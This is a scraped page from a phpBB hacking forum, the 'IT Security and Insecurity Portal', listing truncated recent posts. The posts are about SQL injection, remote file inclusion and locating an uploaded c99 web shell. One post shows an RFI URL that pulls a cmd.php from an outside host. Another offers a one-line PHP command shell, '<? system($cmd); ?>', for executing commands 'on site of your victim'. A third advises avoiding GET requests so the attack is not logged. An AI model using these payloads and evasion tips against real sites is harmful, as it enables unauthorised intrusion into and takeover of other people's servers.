 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 230
 Members: 0
 Total: 230
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
|
speaking fo rmyself, i do the code auditing manually,
using the text search tools. i don't believe there is some
automated tool, you must allways use your inteligency for
source auditing. |
|
|
|
|
kibless - i just took a while to read your adolescent
and rude rants - sorry but you should have to change
your sick attitude NOW!. nobody will help you if you will
continue to behave this way...
... |
|
|
|
|
| LOL. aren't we talking about SQL injection to .asp ?! |
|
|
|
|
is there any way how to recognise vB version if not
written in the footer? |
|
|
|
|
I got this:
Warning: main(): Failed opening './bands/SELECT username password FROM users.php' for inclusion (include_path='.:/php/includes:/usr/share/php') in /home/virtual/site1/fst/var/www/html/l ... |
|
|
|
|
well so you don't know the source...
and how did you noticed this?
the url looks like this: http://xxx.de/?seite=http://yyy.de/cmd.php
send me a PM with the URL and iwill try to help you.
... |
|
|
|
|
hey, ok i uplaoded c99 to a server and i'm not sure what dorectory they store there uplaoded files to....is there a way of maby grabbing the location of where the shell was uploaded?
RO ... |
|
|
|
|
show up the vulnerable php script source and i will tell you
what's that about. so far i understood you found some RFI?
btw, don't use GET - this got logged and you may experience
some issues lat ... |
|
|
|
|
| may be the file is coded ? if it is .php it may be Zend encryption. |
|
|
|
|
there is many ways how to create own shells, but for this inclusion
you can use simpliest one-liner ever: <? system($cmd); ?> |
|
|
|
|
buddy if your forum is on
http://www.*******.de/index.php
then your board path is /
if your board were www.site.com/forum/index.php
then your board path would be /forum/
that index.php ... |
|
|
|
|
hehehehe buddy you need a doctor  |
|
|
|
|
hey buddy what do you need to know?
it's standard RFI, you just need some host for your custom
"evil" php shell and you can execute commands remotely on
site of your victim.
anyway i recomend ... |
|
|
|
|
benna,
got a time to read entire thread and must say
you're pretty annoying boy.
next time pls appreciate that someone is wasting
the time to help you and don't pick up on chb!
really pls ... |
|
|
|
|
well problem solved. thread may be closed.
target i was testing had some very low version of mysql and thus no
union support. other targets worked fine, just improved specification
was needed:
... |
|
|
| Page 1 of 2 |
Goto page 1, 2Next
All times are GMT |
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
